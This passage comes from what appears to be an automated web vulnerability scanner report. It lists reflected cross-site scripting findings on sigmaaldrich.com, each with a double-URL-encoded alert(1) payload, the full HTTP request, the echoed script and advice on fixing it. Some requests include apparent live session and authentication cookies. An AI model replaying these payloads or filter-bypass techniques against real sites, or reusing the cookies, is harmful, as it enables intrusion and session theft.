       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich59ccd";alert(1)//473b1816d82/home.html","E404") ;
   </script>
...[SNIP]...

1.617. http://www.sigmaaldrich.com/sigma-aldrich/home.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3295%2522%253balert%25281%2529%252f%252f4623e0279e6 was submitted in the REST URL parameter 2. This input was echoed as a3295";alert(1)//4623e0279e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/a3295%2522%253balert%25281%2529%252f%252f4623e0279e6 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.bing.com/search?q=sigma-aldrich&src=IE-SearchBox&FORM=IE8SRC
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:04:59 GMT
Connection: close
Set-Cookie: JSESSIONID=12769bb4-7cef-6841-815f-e898c574e4b1;Path=/
Content-Length: 28918


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/a3295";alert(1)//4623e0279e6","E404") ;
   </script>
...[SNIP]...

1.618. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home/remember.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f5f3%2522%253balert%25281%2529%252f%252ff40942c501d was submitted in the REST URL parameter 1. This input was echoed as 9f5f3";alert(1)//f40942c501d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich9f5f3%2522%253balert%25281%2529%252f%252ff40942c501d/home/remember.html?Country=United+States&Code=USA&Page=HP&SO=US HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=&t1=1289930569827&t2=1289930570045&t3=1289930573399&lti=1289930573399&ln=&hr=/sigma-aldrich/home/remember.html%3FCountry%3DUnited+States%26Code%3DUSA%26Page%3DHP%26SO%3DUS&fti=&fn=form1%3A0%3B&ac=&fd=&uer=&fu=&pi=/sigma-aldrich/home.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934&ul=http%3A//www.sigmaaldrich.com/sigma-aldrich/home.html&rf=http%3A//www.bing.com/search%3Fq%3Dsigma-aldrich%26src%3DIE-SearchBox%26FORM%3DIE8SRC

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:04 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28936


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich9f5f3";alert(1)//f40942c501d/home/remember.html","E404") ;
   </script>
...[SNIP]...

1.619. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home/remember.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78a78%2522%253balert%25281%2529%252f%252fda047cff439 was submitted in the REST URL parameter 2. This input was echoed as 78a78";alert(1)//da047cff439 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/home78a78%2522%253balert%25281%2529%252f%252fda047cff439/remember.html?Country=United+States&Code=USA&Page=HP&SO=US HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=&t1=1289930569827&t2=1289930570045&t3=1289930573399&lti=1289930573399&ln=&hr=/sigma-aldrich/home/remember.html%3FCountry%3DUnited+States%26Code%3DUSA%26Page%3DHP%26SO%3DUS&fti=&fn=form1%3A0%3B&ac=&fd=&uer=&fu=&pi=/sigma-aldrich/home.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934&ul=http%3A//www.sigmaaldrich.com/sigma-aldrich/home.html&rf=http%3A//www.bing.com/search%3Fq%3Dsigma-aldrich%26src%3DIE-SearchBox%26FORM%3DIE8SRC

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:07 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28936


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/home78a78";alert(1)//da047cff439/remember.html","E404") ;
   </script>
...[SNIP]...

1.620. http://www.sigmaaldrich.com/sigma-aldrich/home/remember.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/home/remember.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ce0f%2522%253balert%25281%2529%252f%252f52560ae4772 was submitted in the REST URL parameter 3. This input was echoed as 3ce0f";alert(1)//52560ae4772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/home/3ce0f%2522%253balert%25281%2529%252f%252f52560ae4772 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:13 GMT
Content-Length: 28923
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/home/3ce0f";alert(1)//52560ae4772","E404") ;
   </script>
...[SNIP]...

1.621. http://www.sigmaaldrich.com/site-level/career-opportunites.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/career-opportunites.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 136f5%2522%253balert%25281%2529%252f%252f844bb64fe02 was submitted in the REST URL parameter 1. This input was echoed as 136f5";alert(1)//844bb64fe02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level136f5%2522%253balert%25281%2529%252f%252f844bb64fe02/career-opportunites.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level136f5";alert(1)//844bb64fe02/career-opportunites.html","E404") ;
   </script>
...[SNIP]...

1.622. http://www.sigmaaldrich.com/site-level/career-opportunites.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/career-opportunites.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3767d%2522%253balert%25281%2529%252f%252f8befdd2d8d4 was submitted in the REST URL parameter 2. This input was echoed as 3767d";alert(1)//8befdd2d8d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/3767d%2522%253balert%25281%2529%252f%252f8befdd2d8d4 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28915
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/3767d";alert(1)//8befdd2d8d4","E404") ;
   </script>
...[SNIP]...

1.623. http://www.sigmaaldrich.com/site-level/corporate.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbe14%2522%253balert%25281%2529%252f%252f6b22372e485 was submitted in the REST URL parameter 1. This input was echoed as bbe14";alert(1)//6b22372e485 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-levelbbe14%2522%253balert%25281%2529%252f%252f6b22372e485/corporate.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; 